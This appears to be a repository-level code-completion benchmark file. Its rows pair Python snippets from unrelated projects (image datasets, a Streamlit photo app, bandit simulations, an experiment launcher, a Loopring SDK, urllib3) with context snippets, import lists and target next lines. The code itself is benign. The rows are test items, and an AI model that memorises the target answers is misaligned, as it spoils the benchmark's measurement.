th.tensor(self.tabular_features.get(key), dtype=self.tensors_dtype)
),
th.tensor(self.objectives.get(key), dtype=self.tensors_dtype),
)
@property
def shape(self) -> UdaoItemShape:
return UdaoItemShape(
feature_names=list(self.tabular_features.data.columns),
output_names=list(self.objectives.data.columns),
)
@staticmethod
def collate(
items: Sequence[Tuple[UdaoInput, th.Tensor]]
) -> Tuple[UdaoInput, th.Tensor]:
features = UdaoInput(th.vstack([item[0].features for item in items]))
objectives = th.vstack([item[1] for item in items])
return features, objectives
| class DummyUdaoEmbedIterator(UdaoIterator[UdaoEmbedInput, UdaoEmbedItemShape]): | 3 | 2023-12-20 09:10:42+00:00 | 2k |
SnailForce/SIM-Net | data/mask_dataset.py | [
{
"identifier": "BaseDataset",
"path": "data/base_dataset.py",
"snippet": "class BaseDataset(data.Dataset, ABC):\n \"\"\"This class is an abstract base class (ABC) for datasets.\n\n To create a subclass, you need to implement the following four functions:\n -- <__init__>: initialize the class, first call BaseDataset.__init__(self, opt).\n -- <__len__>: return the size of dataset.\n -- <__getitem__>: get a data point.\n -- <modify_commandline_options>: (optionally) add dataset-specific options and set default options.\n \"\"\"\n\n def __init__(self, opt):\n \"\"\"Initialize the class; save the options in the class\n\n Parameters:\n opt (Option class)-- stores all the experiment flags; needs to be a subclass of BaseOptions\n \"\"\"\n self.opt = opt\n self.root = opt.dataroot\n\n @staticmethod\n def modify_commandline_options(parser, is_train):\n \"\"\"Add new dataset-specific options, and rewrite default values for existing options.\n\n Parameters:\n parser -- original option parser\n is_train (bool) -- whether training phase or test phase. You can use this flag to add training-specific or test-specific options.\n\n Returns:\n the modified parser.\n \"\"\"\n return parser\n\n @abstractmethod\n def __len__(self):\n \"\"\"Return the total number of images in the dataset.\"\"\"\n return 0\n\n @abstractmethod\n def __getitem__(self, index):\n \"\"\"Return a data point and its metadata information.\n\n Parameters:\n index - - a random integer for data indexing\n\n Returns:\n a dictionary of data with their names. It ususally contains the data itself and its metadata information.\n \"\"\"\n pass"
},
{
"identifier": "get_transform",
"path": "data/base_dataset.py",
"snippet": "def get_transform(opt, params=None, grayscale=False, method=Image.BICUBIC, convert=True):\n transform_list = []\n if grayscale:\n transform_list.append(transforms.Grayscale(1))\n if 'resize' in opt.preprocess:\n osize = [opt.load_size, opt.load_size]\n transform_list.append(transforms.Resize(osize, method))\n elif 'scale_width' in opt.preprocess:\n transform_list.append(transforms.Lambda(lambda img: __scale_width(img, opt.load_size, opt.crop_size, method)))\n\n if 'crop' in opt.preprocess:\n if params is None:\n transform_list.append(transforms.RandomCrop(opt.crop_size))\n else:\n transform_list.append(transforms.Lambda(lambda img: __crop(img, params['crop_pos'], opt.crop_size)))\n\n if opt.preprocess == 'none':\n transform_list.append(transforms.Lambda(lambda img: __make_power_2(img, base=4, method=method)))\n\n if not opt.no_flip:\n if params is None:\n transform_list.append(transforms.RandomHorizontalFlip())\n elif params['flip']:\n transform_list.append(transforms.Lambda(lambda img: __flip(img, params['flip'])))\n\n if convert:\n transform_list += [transforms.ToTensor()]\n # if grayscale:\n # transform_list += [transforms.Normalize((0.5,), (0.5,))]\n # else:\n # transform_list += [transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]\n return transforms.Compose(transform_list)"
},
{
"identifier": "make_dataset_by_name",
"path": "data/image_folder.py",
"snippet": "def make_dataset_by_name(dir, max_dataset_size=float(\"inf\")):\n images = []\n assert os.path.isdir(dir), '%s is not a valid directory' % dir\n\n for root, _, fnames in sorted(os.walk(dir)):\n for fname in fnames:\n if is_image_file(fname):\n # path = os.path.join(root, fname)\n images.append(fname)\n return images[:min(max_dataset_size, len(images))]"
}
] | import os,yaml
import torch.nn.functional as F
import random
import numpy as np
import collections
import torch
from data.base_dataset import BaseDataset, get_transform
from data.image_folder import make_dataset_by_name
from PIL import Image,ImageFilter | 1,213 |
class MaskDataset(BaseDataset):
def __init__(self, opt):
"""Initialize this dataset class.
Parameters:
opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions
"""
BaseDataset.__init__(self, opt)
self.root_dir = os.path.join(opt.dataroot,'class')
self.phase = opt.phase
self.img_mask_dict = {}
self.img_names = {}
self.data_size = {}
self.label_list = os.listdir(os.path.join(self.root_dir))
# The shape of the human face is more complex, so increase the training ratio
if "face" in self.label_list:
self.label_list.append("face")
for label in self.label_list:
label_dir = os.path.join(self.root_dir,label,"images")
with open(os.path.join(self.root_dir,label,'list.yaml')) as f:
self.img_mask_dict[label] = yaml.safe_load(f)
self.img_names[label] = list(self.img_mask_dict[label].keys())
self.data_size[label] = len(self.img_names[label])
|
class MaskDataset(BaseDataset):
def __init__(self, opt):
"""Initialize this dataset class.
Parameters:
opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions
"""
BaseDataset.__init__(self, opt)
self.root_dir = os.path.join(opt.dataroot,'class')
self.phase = opt.phase
self.img_mask_dict = {}
self.img_names = {}
self.data_size = {}
self.label_list = os.listdir(os.path.join(self.root_dir))
# The shape of the human face is more complex, so increase the training ratio
if "face" in self.label_list:
self.label_list.append("face")
for label in self.label_list:
label_dir = os.path.join(self.root_dir,label,"images")
with open(os.path.join(self.root_dir,label,'list.yaml')) as f:
self.img_mask_dict[label] = yaml.safe_load(f)
self.img_names[label] = list(self.img_mask_dict[label].keys())
self.data_size[label] = len(self.img_names[label]) | self.transform = get_transform(self.opt) | 1 | 2023-12-16 12:49:10+00:00 | 2k |
adarshsankarrs/PhotoshopApp | app.py | [
{
"identifier": "MultiApp",
"path": "multiapp.py",
"snippet": "class MultiApp:\n \"\"\"Framework for combining multiple streamlit applications.\n \"\"\"\n def __init__(self):\n self.apps = []\n\n def add_app(self, title, func):\n \"\"\"Adds a new application.\n\n \"\"\"\n self.apps.append({\n \"title\": title,\n \"function\": func\n })\n\n def run(self):\n # app = st.sidebar.radio(\n app = st.sidebar.selectbox(\n 'Select from the options',\n self.apps,\n format_func=lambda app: app['title'])\n\n app['function']()"
},
{
"identifier": "home",
"path": "apps/home.py",
"snippet": "def app():"
},
{
"identifier": "sketch",
"path": "apps/sketch.py",
"snippet": "DEMO_IMAGE = 'imgs/Tiger.jpg'\ndef app():\n def img2sketch(photo, k_size):"
},
{
"identifier": "inpaint",
"path": "apps/inpaint.py",
"snippet": "def app():\n def inpaintt(img,mask):\n DEMO_IMAGE = 'imgs/impai.png'\n DEMO_IMAGE_MASK = 'imgs/maskn.png'"
},
{
"identifier": "stadap",
"path": "apps/stadap.py",
"snippet": "def app():\n def adap(img):\n DEMO_IMAGE = 'imgs/scannedimg.jpeg'"
},
{
"identifier": "textonimg",
"path": "apps/textonimg.py",
"snippet": "DEMO_IMAGE = 'imgs/Tiger.jpg'\ndef app():\n def imgtext(photo, text):"
},
{
"identifier": "Edge_Cont",
"path": "apps/Edge_Cont.py",
"snippet": "def app():\r\n def load_image(filename):\r\n def photo():\r\n DEMO_IMAGE = 'imgs/Tiger.jpg'\r"
},
{
"identifier": "Face_detect",
"path": "apps/Face_detect.py",
"snippet": "def app():\r\n def face_detection():\r\n DEMO_IMAGE = 'imgs/Person.jpg'\r"
},
{
"identifier": "Crop",
"path": "apps/Crop.py",
"snippet": "def app():\r"
},
{
"identifier": "filters",
"path": "apps/filters.py",
"snippet": "def app():\r\n def load_image():\r\n def img2bright(photo):\r\n def img2enh(photo):\r\n def img2inv(photo):\r\n def gamma_function1(channel, gamma):\r\n def img2sum(photo):\r\n def gamma_function2(channel, gamma):\r\n def img2win(photo):\r\n def img2sepia(photo):\r\n def hsv(img, l, u):\r\n def img2splash(photo):\r\n def img2cont(photo):\r\n def img2emb(photo):\r\n def tv_60(photo):\r\n def img2cartoon(photo):\r\n def img2sketch(photo, k_size):\r\n def exponential_function(channel, exp):\r\n def img2tone(img, number):\r\n def img2day(photo):\r\n def img2pen(photo):\r\n def comic(photo):\r\n DEMO_IMAGE = 'imgs/Tiger.jpg'\r\n SP_DEMO_IMAGE = 'imgs/ball.jpg'\r\n SP_IMAGE = 'imgs/Splash.jpg' \r"
},
{
"identifier": "abtus",
"path": "apps/abtus.py",
"snippet": "def app():"
},
{
"identifier": "Feature_detect",
"path": "apps/Feature_detect.py",
"snippet": "DEMO_IMAGE = 'imgs/Person.jpg'\r\ndef app():\r\n def load_image():\r\n def feature_detection():\r"
}
] | import streamlit as st
import numpy as np
import pandas as pd
import cv2
from PIL import Image, ImageOps
from multiapp import MultiApp
from apps import home,sketch,inpaint,stadap,textonimg,Edge_Cont,Face_detect,Crop,filters,abtus,Feature_detect | 928 | app = MultiApp()
# option = st.selectbox(
# 'Select from the options',
# ('Home', 'Filters', 'Doc scanner','add text'), key = 1)
# if(option=='Filters'):
# opt = st.selectbox(
# 'Select from the options',
# ('sepia', 'Filter1', 'filter2','filter3'), key = 2)
# Add all your application here
app.add_app("Home", home.app)
app.add_app("Add filters to image", filters.app)
app.add_app("Sketch", sketch.app)
app.add_app("Image inpainting", inpaint.app)
app.add_app("Doc Scanner", stadap.app)
app.add_app("Add Title to image", textonimg.app)
app.add_app("Crop an Image", Crop.app)
app.add_app("Edge and Contour detection ", Edge_Cont.app)
| app = MultiApp()
# option = st.selectbox(
# 'Select from the options',
# ('Home', 'Filters', 'Doc scanner','add text'), key = 1)
# if(option=='Filters'):
# opt = st.selectbox(
# 'Select from the options',
# ('sepia', 'Filter1', 'filter2','filter3'), key = 2)
# Add all your application here
app.add_app("Home", home.app)
app.add_app("Add filters to image", filters.app)
app.add_app("Sketch", sketch.app)
app.add_app("Image inpainting", inpaint.app)
app.add_app("Doc Scanner", stadap.app)
app.add_app("Add Title to image", textonimg.app)
app.add_app("Crop an Image", Crop.app)
app.add_app("Edge and Contour detection ", Edge_Cont.app) | app.add_app("Face detection", Face_detect.app) | 7 | 2023-12-20 20:32:16+00:00 | 2k |
DURUII/Replica-AUCB | main.py | [
{
"identifier": "StrategicArm",
"path": "arms.py",
"snippet": "class StrategicArm(NormalArm):\n c_min, c_max = 0.1, 1\n\n def __init__(self):\n # in the paper, r is expected reward\n r = random.uniform(0.1, 1)\n # to make that sample value is within 0~1 with 97%\n sigma = random.uniform(0, min(r / 3, (1 - r) / 3))\n super().__init__(r, sigma)\n\n # c for cost, b for bid, c_i = b_i according to the theorem 2\n self.c = random.uniform(0.1, 1)\n self.b = self.c"
},
{
"identifier": "Config",
"path": "config.py",
"snippet": "class Config:\n N = 60\n N_range = [50, 60, 70, 80, 90, 100]\n\n K = 20\n K_range = [10, 20, 30, 40, 50]\n\n B = 5e5\n B_range = [i * 10 for i in range(1, 11)]\n B_range = np.array(B_range) * 1e4\n\n line_styles = {\n 'AUCB': {'color': '#060506', 'marker': 's', 'label': 'AUCB'},\n 'optimal': {'color': '#ed1e25', 'marker': 'o', 'label': 'optimal'},\n 'separated': {'color': '#3753a4', 'marker': '^', 'label': 'separated'},\n '0.1-first': {'color': '#097f80', 'marker': 'v', 'label': '0.1-first'},\n '0.5-first': {'color': '#ba529e', 'marker': '<', 'label': '0.5-first'},\n }\n\n # bar style\n bar_width = 0.15\n bar_styles = {\n 'AUCB': {'color': '#060506', 'label': 'AUCB', 'hatch': ''},\n 'optimal': {'color': '#ed1e25', 'label': 'optimal', 'hatch': '||||'},\n 'separated': {'color': '#3753a4', 'label': 'separated', 'hatch': '/////'},\n '0.1-first': {'color': '#097f80', 'label': '0.1-first', 'hatch': '\\\\\\\\\\\\\\\\\\\\'},\n '0.5-first': {'color': '#ba529e', 'label': '0.5-first', 'hatch': '---'},\n }"
},
{
"identifier": "Emulator",
"path": "emulator.py",
"snippet": "class Emulator:\n algorithms = ['AUCB', 'optimal', 'separated', '0.1-first', '0.5-first']\n\n def __init__(self, arms: list[StrategicArm] = None, n_arms: int = 60, n_selected: int = 20, budget: float = 5e5):\n self.N = n_arms\n self.K = n_selected\n self.B = budget\n\n self.arms = arms\n if arms is None:\n self.arms = [StrategicArm() for _ in range(self.N)]\n\n self.name2sol = {}\n\n def build(self):\n for algo in Emulator.algorithms:\n if algo == 'AUCB':\n self.name2sol[algo] = AUCB(self.arms, self.N, self.K, self.B)\n elif algo == 'optimal':\n self.name2sol[algo] = Opt(self.arms, self.N, self.K, self.B)\n elif algo == 'separated':\n self.name2sol[algo] = Separated(self.arms, self.N, self.K, self.B)\n elif algo.endswith('-first'):\n self.name2sol[algo] = EpsilonFirst(self.arms, self.N, self.K, self.B, float(algo[:-6]))\n\n def simulate(self):\n self.build()\n name2res = {name: None for name in self.name2sol.keys()}\n for name in name2res.keys():\n # instance of an algorithm\n solver = self.name2sol[name]\n solver.initialize()\n name2res[name] = solver.run()\n return name2res"
}
] | import os
import pandas as pd
import numpy as np
import pickle
from matplotlib import pyplot as plt
from tqdm import tqdm
from arms import StrategicArm
from config import Config
from emulator import Emulator | 1,153 | """
Author: DURUII
Date: 2023/12/17
"""
plt.style.use(['science', 'grid'])
config = Config
# data preparation
if not os.path.exists('./runs.pkl'):
data = []
for X in ['N', 'K', 'B']:
for x in tqdm(eval(f'config.{X}_range'), desc=X):
if X == 'N':
| """
Author: DURUII
Date: 2023/12/17
"""
plt.style.use(['science', 'grid'])
config = Config
# data preparation
if not os.path.exists('./runs.pkl'):
data = []
for X in ['N', 'K', 'B']:
for x in tqdm(eval(f'config.{X}_range'), desc=X):
if X == 'N': | name2res = Emulator(n_arms=x).simulate() | 2 | 2023-12-15 18:17:01+00:00 | 2k |
XLearning-SCU/2023-TPAMI-SMILE | _AutoLauncher.py | [
{
"identifier": "path_operator",
"path": "_MainLauncher.py",
"snippet": "def get_settings():\r\ndef clear_gpu_fail(root):\r\ndef run():\r\ndef main():\r"
},
{
"identifier": "Launcher",
"path": "_Utils/Launcher.py",
"snippet": "class Launcher(SubprocessOperator):\r\n def __init__(self, path_operator, env_config='', queue=None):\r\n self.path_operator = path_operator\r\n self.env_config = env_config\r\n self.queue = queue\r\n\r\n def show_tensorboard(self, path_to_runs):\r\n python_path = self.path_operator.python_path\r\n tensorboard_path = os.path.join(os.path.dirname(python_path), 'tensorboard')\r\n # self.__call__(cmd='find \\'{}\\' | grep tfevents'.format(path_to_runs))\r\n # self.__call__(cmd='{} {} --inspect --logdir \\'{}\\''.format(python_path, tensorboard_path, path_to_runs))\r\n self.__call__(cmd='{} {} --logdir \\'{}\\' {}'.format(\r\n python_path, tensorboard_path, path_to_runs, self.path_operator.tensorboard_arg))\r\n\r\n def launch(self, cfg, run_file=\"main.py\", safe_mode=True, model_name='Train', clean_fold=True):\r\n fold_path = self.path_operator.get_code_path(code_fold_name=cfg.get_name(), level=3)\r\n if os.path.exists(os.path.join(fold_path, 'Checkpoints')):\r\n warnings.warn('There are some checkpoints in \"{}\".'.format(fold_path))\r\n if clean_fold:\r\n DirectoryOperator.FoldOperator(directory=fold_path).clear(delete_root=False, not_to_delete_file=safe_mode)\r\n code_root = os.path.join(fold_path, '{}Code'.format(model_name))\r\n # if sys.platform != 'win32':\r\n # code_root = '\"{}\"'.format(code_root)\r\n DirectoryOperator.FoldOperator(directory='./').copy(\r\n dst_fold=code_root, not_to_delete_file=safe_mode, ignore=ignore_patterns('__pycache__', '.idea', '_bac'))\r\n python_cmd = '{} -u {} {}'.format(\r\n self.path_operator.python_path,\r\n # np.random.randint(0,1000),\r\n run_file,\r\n cfg.get_config(),\r\n )\r\n txt_path = '\"{:}.txt\"'.format(os.path.join(fold_path, model_name))\r\n if sys.platform != 'win32':\r\n py_cmd = \"{append_config:} nohup {python_cmd:} > {txt_path:} 2>&1 &\".format(\r\n append_config=self.env_config + ' CUDA_VISIBLE_DEVICES={}'.format(cfg.cuda),\r\n python_cmd=python_cmd,\r\n txt_path=txt_path,\r\n )\r\n else:\r\n py_cmd = \"start /b {python_cmd:} > {txt_path:} 2>&1\".format(\r\n python_cmd=python_cmd,\r\n txt_path=txt_path,\r\n )\r\n self.__call__(\r\n cmd=\"cd \\\"{code_root:}\\\" && {py_cmd:}\".format(\r\n code_root=code_root,\r\n py_cmd=py_cmd,\r\n )\r\n )\r\n\r\n def quick_launch(self, settings, config_operator, **kwargs):\r\n \"\"\"\r\n settings: [cuda, [yaml_list], arg_dict]\r\n \"\"\"\r\n timer = Timer()\r\n total_count = len(settings)\r\n for cuda, yaml_list, arg_dict in settings:\r\n t_start = time.time()\r\n cfg = config_operator(\r\n yaml_list=yaml_list,\r\n cuda=cuda,\r\n **arg_dict,\r\n )\r\n work_root = self.path_operator.get_code_path(code_fold_name=cfg.get_name(), level=3)\r\n if os.path.exists(work_root):\r\n print(\"Skipping a code running due to its log already exists. work_root == {}\".format(work_root))\r\n total_count -= 1\r\n continue\r\n if self.queue is not None:\r\n self.queue.enqueue(work_root=work_root, cuda=cuda)\r\n self.launch(\r\n cfg=cfg,\r\n **kwargs\r\n )\r\n timer.update(time.time()-t_start)\r\n timer.count -= 1\r\n timer.show(total_count=total_count)\r\n timer.count += 1\r\n if self.queue is not None:\r\n self.queue.close()\r"
},
{
"identifier": "ConfigOperator",
"path": "_Utils/ConfigOperator.py",
"snippet": "class ConfigOperator:\r\n def __init__(self, cuda, yaml_list=None, **kwargs):\r\n self.config = EasyDict()\r\n self.cuda = cuda\r\n if yaml_list is not None:\r\n for yaml_path in yaml_list:\r\n with open(yaml_path, 'r') as stream:\r\n config = yaml.safe_load(stream)\r\n self.add_kwargs(**config)\r\n self.add_kwargs(**kwargs)\r\n self.config = EasyDict(dict(sorted(self.config.items())))\r\n\r\n def add_kwargs(self, **kwargs):\r\n for k, v in kwargs.items():\r\n if v == '':\r\n continue\r\n self.config[k] = v\r\n\r\n def get_config(self, for_path=False, *args, **kwargs):\r\n config = ''\r\n for k, val in self.config.items():\r\n if isinstance(val, bool):\r\n if val:\r\n config += ' --{}'.format(k)\r\n elif isinstance(val, str) and (len(val.split('\\\\')) > 1 or len(val.split('/')) > 1):\r\n if for_path:\r\n config += ' --{} {}'.format(\r\n k,\r\n os.path.join(*val.replace('\\\\', '/').split('/')[-1:]).replace('/', '@')[:8],\r\n )\r\n else:\r\n config += ' --{} \\\"{}\\\"'.format(k, val)\r\n else:\r\n config += ' --{} {}'.format(k, val)\r\n return config\r\n\r\n def get_name(self, *args, **kwargs):\r\n return \"{}\".format(self.get_config(for_path=True))\r\n\r\n def show_config(self):\r\n print(self.config)\r\n # print(self.config.setup)\r\n # print(self.config.backbone)\r\n # print(self.config.model_kwargs)\r\n # print(self.config.model_kwargs.head)\r"
}
] | import time
from _MainLauncher import path_operator
from _Utils import Launcher
from _Utils.ConfigOperator import ConfigOperator
| 1,420 |
def main():
class C2(ConfigOperator):
def get_name(self, *args, **kwargs):
return '_QueueLog'
|
def main():
class C2(ConfigOperator):
def get_name(self, *args, **kwargs):
return '_QueueLog'
| Launcher.Launcher(
| 1 | 2023-12-21 08:50:36+00:00 | 2k |
precisionalgorithms/loopring-python-SDK | main.py | [
{
"identifier": "Session",
"path": "loopring/session.py",
"snippet": "class Session:\n \"\"\"\n Parent class for Loopring API.\n \"\"\"\n # Class variables\n api_key = None\n account_id = None\n headers = None\n base_url = 'https://api3.loopring.io/api/v3'\n\n @classmethod\n def initialize(cls):\n \"\"\"\n Initialize the Loopring API with API key and account ID.\n \"\"\"\n load_dotenv()\n cls.api_key = os.environ.get(\"API_KEY\")\n cls.account_id = os.environ.get(\"ACCOUNT_ID\")\n cls.headers = {\n 'Accept': 'application/json',\n 'X-API-KEY': cls.api_key\n }"
},
{
"identifier": "Account",
"path": "loopring/account.py",
"snippet": "class Account(Session):\n\n def get_account_balances(\n self,\n address: str = \"\",\n tokens: str = \"\"\n ) -> list[Balance]:\n \"\"\"\n Get the balances for the account associated with the API key.\n\n :param address: Address of the account to fetch balances for.\n :param tokens: List of token IDs to fetch balances for.\n\n :return: Dataclass.\n \"\"\"\n url = (f'{self.base_url}/user/balances?accountId={self.account_id}'\n f'&address={address}&tokens={tokens}')\n\n response = requests.get(url, headers=self.headers)\n\n if response.status_code == 200:\n data = response.json()\n return [Balance(**entry) for entry in data]\n else:\n print(\"Error fetching account balance:\", response.status_code)\n return response.json()"
},
{
"identifier": "Exchange",
"path": "loopring/exchange.py",
"snippet": "class Exchange(Session):\n\n def get_tokens(self) -> list[TokenInfo]:\n \"\"\"\n Get the tokens supported by the Loopring protocol.\n\n :return: List of tokens.\n \"\"\"\n url = f'{self.base_url}/exchange/tokens'\n\n response = requests.get(url, headers=self.headers)\n\n if response.status_code == 200:\n data = response.json()\n return [TokenInfo(**entry) for entry in data]\n else:\n print(\"Error fetching tokens:\", response.status_code)\n return response.json()\n\n def get_exchange_info(self) -> ExchangeInfo:\n \"\"\"\n Get the exchange info.\n\n :return: Exchange Info.\n \"\"\"\n url = f'{self.base_url}/exchange/info'\n\n response = requests.get(url, headers=self.headers)\n\n if response.status_code == 200:\n data = response.json()\n return ExchangeInfo(**data)\n else:\n print(\"Error fetching tokens:\", response.status_code)\n return response.json()\n\n def get_markets(self) -> list[MarketInfo]:\n \"\"\"\n Get the markets supported by the Loopring protocol.\n\n :return: List of markets.\n \"\"\"\n url = f'{self.base_url}/exchange/markets'\n\n response = requests.get(url, headers=self.headers)\n\n if response.status_code == 200:\n data = response.json()\n return [MarketInfo(**entry) for entry in data['markets']]\n else:\n print(\"Error fetching markets:\", response.status_code)\n return response.json()"
},
{
"identifier": "join_balance_with_token_info",
"path": "utils.py",
"snippet": "def join_balance_with_token_info(\n balances: List[Balance],\n tokens: List[TokenInfo]\n) -> list[DetailedBalance]:\n \"\"\"\n Join the Balance dataclass with the TokenInfo dataclass.\n \"\"\"\n token_info_map = {token.tokenId: token for token in tokens}\n joined_data = []\n for balance in balances:\n token_info = token_info_map.get(balance.tokenId)\n if token_info:\n combined_data = {\n 'accountId': balance.accountId,\n 'tokenId': balance.tokenId,\n 'total': balance.total,\n 'converted_total': convert_from_wei(balance.total, token_info.decimals),\n 'locked': balance.locked,\n 'pending': balance.pending,\n 'symbol': token_info.symbol,\n 'name': token_info.name,\n 'address': token_info.address,\n 'decimals': token_info.decimals\n\n }\n joined_data.append(combined_data)\n\n return [DetailedBalance(**entry) for entry in joined_data]"
}
] | import pickle
from loopring.session import Session
from loopring.account import Account
from loopring.exchange import Exchange
from utils import join_balance_with_token_info | 1,087 |
# Initialize the Loopring API with API key and account ID
Session.initialize()
# Get the account balances
account = Account()
balances = account.get_account_balances()
# Get token info on exchange
|
# Initialize the Loopring API with API key and account ID
Session.initialize()
# Get the account balances
account = Account()
balances = account.get_account_balances()
# Get token info on exchange | exchange = Exchange() | 2 | 2023-12-18 00:19:56+00:00 | 2k |
Liyulingyue/ModulelyTools | codes/extraction/ModuleTools.py | [
{
"identifier": "parse_ipynb",
"path": "codes/extraction/ipynb/ipynb_analyse.py",
"snippet": "def parse_ipynb(file_path):\n \"\"\"\n # 示例:使用函数解析一个ipynb文件\n file_path = 'main.ipynb' # 请将此处替换为您的ipynb文件路径\n result = parse_ipynb(file_path)\n print(result)\n \"\"\"\n # 读取ipynb文件\n with open(file_path, 'r', encoding='utf-8') as f:\n nb = nbformat.read(f, as_version=4)\n\n # 初始化结果列表\n parsed_cells = []\n\n # 对每一个cell进行处理\n for cell in nb.cells:\n cell_dict = {}\n if cell.cell_type == 'markdown':\n cell_dict['属性'] = 'Markdown'\n cell_dict['内容'] = cell.source\n cell_dict['输出'] = ''\n elif cell.cell_type == 'code':\n cell_dict['属性'] = 'Code'\n cell_dict['内容'] = cell.source\n cell_dict['输出'] = ''\n else:\n raise ValueError(f\"Unsupported cell type: {cell.cell_type}\")\n parsed_cells.append(cell_dict)\n return parsed_cells"
},
{
"identifier": "get_ipynb_content",
"path": "codes/extraction/ipynb/ipynb_analyse.py",
"snippet": "def get_ipynb_content(parsed_cells):\n ipynb_content = \"\"\n\n for i in range(len(parsed_cells)):\n if parsed_cells[i]['属性'] == \"Code\":\n ipynb_content += f\"[Cell No. {i}]\\n {parsed_cells[i]['内容']}\\n\\n\"\n\n return ipynb_content"
},
{
"identifier": "get_model_list",
"path": "codes/extraction/ipynb/ipynb_analyse.py",
"snippet": "def get_model_list(ipynb_content, llm):\n prompt = \\\nf\"\"\" \n我将给你一些NoteBook中的测试代码,请你阅读这些代码,并根据代码内容进行架构设计,使用json格式返回设计结果。\nNoteBook中的代码是{ipynb_content}\nJson返回的内容格式为:\n{str('{')}\n\"模块\":list[dict{str('{')}\"Name\":str, \"Type\":str, \"Introduction\":str{str('}')}]\n{str('}')}\n“模块”信息是一个list,每个元素是一个字典,包括了模块名称,模块类型(取值为\"class\"或\"function\"),模块介绍\n\"\"\"\n json_data = llm.get_llm_json_answer(prompt)\n return json_data[\"模块\"]"
},
{
"identifier": "model_list2python",
"path": "codes/extraction/ipynb/ipynb_analyse.py",
"snippet": "def model_list2python(model_list, ipynb_content, llm):\n py_str = \"\"\n for model_dict in model_list:\n model_name = model_dict[\"Name\"]\n model_type = model_dict[\"Type\"]\n model_intro = model_dict[\"Introduction\"]\n\n prompt = \\\nf\"\"\" \n我将给你一个模块名称和模块类型,以及一些Notebook中的测试代码,并根据代码内容实现这个模块,使用json格式返回设计结果。\n模块名称是{model_name},请定义为一个{model_type},模块的功能是{model_intro},NoteBook中的代码是{ipynb_content}。\nJson返回的内容格式为:\n{str('{')}\n\"代码\":multi-lines str\n{str('}')}\n“代码”信息是一个多行字符串,内容是你根据NoteBook中的代码和模块的功能,对模块{model_name}的程序实现,请保证生成的代码可以直接运行,解释说明的内容采用注释标记。\n\"\"\"\n\n # model_impl = get_llm_json_answer(prompt)\n try:\n model_impl = llm.get_llm_json_answer(prompt)\n py_str += model_impl[\"代码\"]\n except:\n py_str += f\"# 模块{model_name},类型是{model_type},生成失败\"\n py_str += \"\\n\\n\"\n return py_str"
},
{
"identifier": "extract_function_defs",
"path": "codes/extraction/py/py_analyse.py",
"snippet": "def extract_function_defs(node, function_defs):\n if isinstance(node, ast.FunctionDef):\n function_source = ast.unparse(node)\n function_defs.append([node.name, function_source, [arg.arg for arg in node.args.args], ast.get_docstring(node)])\n elif isinstance(node, ast.ClassDef):\n function_source = ast.unparse(node)\n function_defs.append([node.name, function_source, [stmt.name for stmt in node.body if isinstance(stmt, ast.FunctionDef)], ast.get_docstring(node)])\n else:\n for child in ast.iter_child_nodes(node):\n extract_function_defs(child, function_defs)"
},
{
"identifier": "get_function_defs",
"path": "codes/extraction/py/py_analyse.py",
"snippet": "def get_function_defs(code):\n tree = ast.parse(code)\n function_defs = []\n extract_function_defs(tree, function_defs)\n return function_defs # a list, each element is [define of function/class, docstring]"
},
{
"identifier": "get_intro_of_fun",
"path": "codes/extraction/py/py_analyse.py",
"snippet": "def get_intro_of_fun(fun_str, llm):\n try:\n prompt = f\"\"\"\n 请帮我为这个函数或者类写一段说明介绍,并且以json的形式返回给我。\n 需要解读的函数或者类是{fun_str}\n Json返回的内容格式为:\n {str('{')}\"\n \"说明介绍\":str\n {str('}')}\n \"\"\"\n result = llm.get_llm_answer(prompt)\n try:\n json_dict = llm.extract_json_from_llm_answer(result)\n return json_dict[\"说明介绍\"]\n except:\n return result\n except:\n return \"输出失败\""
}
] | from .ipynb.ipynb_analyse import parse_ipynb, get_ipynb_content, get_model_list, model_list2python
from .py.py_analyse import extract_function_defs, get_function_defs, get_intro_of_fun
from ..llm.Ernie import Ernie
from ..llm.Ernie import Ernie | 1,554 |
class ModuleTools(object):
def __init__(self, llm_type="Ernie"):
        super().__init__()
if llm_type=="Ernie":
self.llm = Ernie()
        else: # default: use Ernie as the LLM
self.llm = Ernie()
def ipynb2py(self, ipynb_path = "example.ipynb", prompt = ""):
|
class ModuleTools(object):
def __init__(self, llm_type="Ernie"):
        super().__init__()
if llm_type=="Ernie":
self.llm = Ernie()
        else: # default: use Ernie as the LLM
self.llm = Ernie()
def ipynb2py(self, ipynb_path = "example.ipynb", prompt = ""): | result = parse_ipynb(ipynb_path) | 0 | 2023-12-17 14:20:45+00:00 | 2k |
Azure-Samples/functions-python-web-crawler | .venv/Lib/site-packages/urllib3/_base_connection.py | [
{
"identifier": "_TYPE_SOCKET_OPTIONS",
"path": ".venv/Lib/site-packages/urllib3/util/connection.py",
"snippet": "_TYPE_SOCKET_OPTIONS = typing.Sequence[typing.Tuple[int, int, typing.Union[int, bytes]]]"
},
{
"identifier": "_DEFAULT_TIMEOUT",
"path": ".venv/Lib/site-packages/urllib3/util/timeout.py",
"snippet": "_DEFAULT_TIMEOUT: Final[_TYPE_DEFAULT] = _TYPE_DEFAULT.token"
},
{
"identifier": "_TYPE_TIMEOUT",
"path": ".venv/Lib/site-packages/urllib3/util/timeout.py",
"snippet": "_TYPE_TIMEOUT = typing.Optional[typing.Union[float, _TYPE_DEFAULT]]"
},
{
"identifier": "Url",
"path": ".venv/Lib/site-packages/urllib3/util/url.py",
"snippet": "class Url(\n typing.NamedTuple(\n \"Url\",\n [\n (\"scheme\", typing.Optional[str]),\n (\"auth\", typing.Optional[str]),\n (\"host\", typing.Optional[str]),\n (\"port\", typing.Optional[int]),\n (\"path\", typing.Optional[str]),\n (\"query\", typing.Optional[str]),\n (\"fragment\", typing.Optional[str]),\n ],\n )\n):\n \"\"\"\n Data structure for representing an HTTP URL. Used as a return value for\n :func:`parse_url`. Both the scheme and host are normalized as they are\n both case-insensitive according to RFC 3986.\n \"\"\"\n\n def __new__( # type: ignore[no-untyped-def]\n cls,\n scheme: str | None = None,\n auth: str | None = None,\n host: str | None = None,\n port: int | None = None,\n path: str | None = None,\n query: str | None = None,\n fragment: str | None = None,\n ):\n if path and not path.startswith(\"/\"):\n path = \"/\" + path\n if scheme is not None:\n scheme = scheme.lower()\n return super().__new__(cls, scheme, auth, host, port, path, query, fragment)\n\n @property\n def hostname(self) -> str | None:\n \"\"\"For backwards-compatibility with urlparse. We're nice like that.\"\"\"\n return self.host\n\n @property\n def request_uri(self) -> 